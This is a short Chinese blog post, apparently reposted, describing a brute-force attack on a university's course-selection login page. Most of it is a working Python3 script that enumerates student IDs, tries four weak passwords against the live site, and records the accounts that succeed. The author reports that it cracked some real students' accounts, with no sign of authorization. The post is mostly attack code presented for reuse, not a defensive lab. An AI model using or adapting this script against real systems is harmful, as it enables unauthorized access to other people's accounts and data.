1.找到某高校官网,发现有一个选课系统登陆页面
2.于是用chrome找到登陆请求
3.设定弱密码
pd=['123456','1234567','12345678','123456789']
4.开始疯狂爆破
#!/usr/bin/python3
#coding:utf8
import sys
import time
from bs4 import BeautifulSoup
import requests
def bp(id,pd):
w=open('password','r+')
w.read()
w.write('密码是'+pd+':\n')
url='http://*****.cn:8080/jwcmis/zyxk/index.jsp'
headers={
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Host':'*****.cn:8080',
'Origin':'http://******.cn:8080'
}
for i in range(12):
if i < 10:
studentid = id+'0'
else:
studentid=id
studentid+=str(i)
sdd=studentid
for n in range(30):
studentid=sdd
if n > 9:
studentid+=str(n)
else:
studentid+='0'+str(n)
postdata={
'studentid':studentid,
'password':pd,
'Submit':'(unable to decode value)'
}
req=requests.Session()
html=req.post(url=url,data=postdata,headers=headers)
html=html.content.decode("gb2312")
soup=BeautifulSoup(html,'html.parser')
s=soup.find('div').find('p')
su=str(s)
if len(su) is 49:
print(su,studentid)
w.write(str(studentid)+'\n')
time.sleep(0.5)
w.close()
if __name__=='__main__':
pd=['123456','1234567','12345678','123456789']
for p in pd:
print(p)
bp('2014211001',pd=p)
5.跑了几分钟,果然有些学生用了上面的弱密码,有些东西就涂掉了,,重点看上面代码,‘——’
原文链接:python3暴力破解网站账号密码,转载请注明来源!